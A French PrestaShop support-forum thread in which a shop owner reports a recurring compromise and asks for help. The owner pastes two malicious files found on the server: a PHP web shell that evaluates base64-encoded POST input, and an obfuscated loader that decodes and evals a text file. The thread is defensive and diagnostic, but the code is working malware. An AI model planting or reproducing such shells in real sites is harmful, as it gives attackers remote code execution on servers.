aide prestashop PhenixSuite Help
    • Catégories
    • Récent
    • Mots-clés
    • Populaire
    • Utilisateurs
    • Groupes
    • Recherche
    • S'inscrire
    • Se connecter

    Nouvelle attaque ?

    Planifier Épinglé Verrouillé Déplacé Discussion générale
    11 Messages 3 Publieurs 870 Vues 3 Watching
    Charger plus de messages
    • Du plus ancien au plus récent
    • Du plus récent au plus ancien
    • Les plus votés
    Répondre
    • Répondre à l'aide d'un nouveau sujet
    Se connecter pour répondre
    Ce sujet a été supprimé. Seuls les utilisateurs avec les droits d'administration peuvent le voir.
    • R Hors-ligne
      RPro
      dernière édition par

      Bonjour à tous,

      Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
      Voici en quelques mots ce que j'ai pu observer :
      Modification du htaccess
      Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
      Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
      J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
      Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?

      Merci pour vos réponses.

      1 réponse Dernière réponse Répondre Citer 0
      • eoliaE Hors-ligne
        eolia
        dernière édition par

        Quelle version de Presta ?

        Créateur de PhenixSuite. Pour plus d'infos : https://eoliashop.com

        1 réponse Dernière réponse Répondre Citer 0
        • R Hors-ligne
          RPro
          dernière édition par

          Désolé pour l'oubli : il s'agit de 1.7.2.4

          1 réponse Dernière réponse Répondre Citer 0
          • eoliaE Hors-ligne
            eolia
            dernière édition par

            Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?

            Créateur de PhenixSuite. Pour plus d'infos : https://eoliashop.com

            1 réponse Dernière réponse Répondre Citer 0
            • R Hors-ligne
              RPro
              dernière édition par

              Non !
              Il y a bien des alertes de modification mais après vérification, c'est normal.
              Aucune modification en rouge.

              1 réponse Dernière réponse Répondre Citer 0
              • eoliaE Hors-ligne
                eolia
                dernière édition par

                il y a quoi dans les fichiers que vous avez supprimé ?

                Créateur de PhenixSuite. Pour plus d'infos : https://eoliashop.com

                1 réponse Dernière réponse Répondre Citer 0
                • R Hors-ligne
                  RPro
                  dernière édition par

                  Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
                  Le fichier confcom.php est vide
                  Le fichier conf.php est le suivant :
                  <!DOCTYPE html>
                  <html>
                  <head>
                  <title>PHP command</title>
                  </head>
                  <body>
                  <form method="post" action="">
                  <input type="text" name="php" id="php">
                  <input type="submit" value="Execute">
                  </form>
                  <?php
                  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
                  $php = $_POST['php'];
                  $php = strtr($php, '-', '=');
                  $php = base64_decode($php);
                  if($php) {
                  $result = eval($php);
                  echo $result;
                  }
                  }
                  ?>
                  </body>
                  </html>

                  Le fichier lowpr.php est le suivant :
                  <?php
                  $table_prefix = "wbzaxsye6w4_duevcwondme";
                  $table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
                  $txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
                  $txt_contents = preg_replace("/\d+/", "", $txt_contents);
                  $wp_content = $txt_contents("lowpr".".txt");
                  eval/Designed with utility, safety and style/($table_prefix($wp_content));
                  ?>

                  J'espère que cela vous donnera des idées car je suis pas compétent !
                  Merci par avance

                  1 réponse Dernière réponse Répondre Citer 0
                  • eoliaE Hors-ligne
                    eolia
                    dernière édition par

                    Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)

                    Créateur de PhenixSuite. Pour plus d'infos : https://eoliashop.com

                    1 réponse Dernière réponse Répondre Citer 0
                    • R Hors-ligne
                      RPro
                      dernière édition par

                      J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
                      Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...

                      1 réponse Dernière réponse Répondre Citer 0
                      • eoliaE Hors-ligne
                        eolia
                        dernière édition par

                        Par contre il faut comprendre les limites du système.
                        La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.
                        Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?

                        Créateur de PhenixSuite. Pour plus d'infos : https://eoliashop.com

                        1 réponse Dernière réponse Répondre Citer 0
                        • herve_02H Hors-ligne
                          herve_02
                          dernière édition par

                          @RPro a dit dans Nouvelle attaque ? :

                          eval/Designed with utility, safety and style/($table_prefix($wp_content));

                          Cela ressemble pas mal à une attaque pour wordpress.

                          1 réponse Dernière réponse Répondre Citer 0
                          • Premier message
                            Dernier message
                          bug
                          26 sujets
                          1.6
                          24 sujets
                          front-office
                          11 sujets
                          1.5
                          8 sujets
                          1.7
                          5 sujets
                          système
                          4 sujets
                          administration
                          3 sujets
                          hack
                          3 sujets
                          module
                          3 sujets
                          performance
                          3 sujets
                          smtp
                          3 sujets
                          transporteurs
                          3 sujets
                          dashboard
                          2 sujets
                          https
                          2 sujets
                          paypal
                          2 sujets
                          promotions
                          2 sujets